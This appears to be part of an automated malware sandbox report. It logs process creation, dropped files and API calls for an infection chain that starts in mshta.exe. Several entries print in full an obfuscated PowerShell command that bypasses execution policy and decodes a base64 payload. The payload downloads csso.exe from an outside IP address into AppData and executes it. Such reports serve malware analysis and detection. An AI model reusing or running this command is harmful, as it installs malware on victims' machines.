                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"Jump to behavior
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00024B37 LoadLibraryA,GetProcAddress,6_2_00024B37
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_029D67BB push es; iretd 3_2_029D67CA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_029D0A18 pushad ; iretd 3_2_029D0ABD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_029D69FB push ds; iretd 3_2_029D6A0A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_029D56F8 pushad ; ret 3_2_029D5721
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_029D5728 pushfd ; ret 3_2_029D5731
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00048945 push ecx; ret 6_2_00048958
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csso.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_000248D7
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000A5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_000A5376
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00043187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00043187
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
